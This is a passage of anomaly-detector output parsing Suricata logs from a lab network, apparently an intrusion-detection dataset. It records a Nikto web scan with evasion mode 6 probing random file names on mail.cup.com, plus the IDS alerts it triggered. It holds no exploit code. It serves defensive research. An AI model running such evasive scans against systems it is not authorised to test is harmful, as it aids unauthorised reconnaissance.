"/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.x-shop\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.x-shop", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.x-shop", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": 
",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46962,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46962, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":319004384865496,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", 
"/parser/model/flow_id/flow_id/flow_id": 319004384865496, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.373160+0000\",\"flow_id\":319004384865496,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46962,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.x-shop\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.x-shop\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.37 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.375251 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46964 -> 192.168.10.154:80", "/parser/model/time": 1583349514.375251, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", 
"/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46964, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.375251 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46964 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.38 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.dbc", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.375561+0000\",\"flow_id\":1672202550949310,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46964,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.dbc\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.dbc\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", 
"/parser/model/time": 1583349514.375561, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1672202550949310,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46964,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.dbc\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.dbc\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46964,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.dbc\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.dbc\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.dbc\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": 
"CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.dbc\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.dbc", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.dbc", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": 
",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46964,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46964, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1672202550949310,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", 
"/parser/model/flow_id/flow_id/flow_id": 1672202550949310, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.375561+0000\",\"flow_id\":1672202550949310,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46964,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.dbc\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.dbc\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.38 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.377295 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46966 -> 192.168.10.154:80", "/parser/model/time": 1583349514.377295, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", 
"/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46966, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.377295 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46966 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.38 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.map", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.377734+0000\",\"flow_id\":2176156833595140,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46966,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.map\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.map\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", 
"/parser/model/time": 1583349514.377734, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":2176156833595140,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46966,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.map\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.map\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46966,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.map\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.map\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.map\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": 
"CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.map\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.map", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.map", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": 
",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46966,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46966, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":2176156833595140,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", 
"/parser/model/flow_id/flow_id/flow_id": 2176156833595140, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.377734+0000\",\"flow_id\":2176156833595140,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46966,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.map\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.map\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.38 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.379849 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46968 -> 192.168.10.154:80", "/parser/model/time": 1583349514.379849, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", 
"/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46968, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.379849 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46968 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.38 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.Big5", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.380109+0000\",\"flow_id\":1414354189338696,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46968,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.Big5\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.Big5\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", 
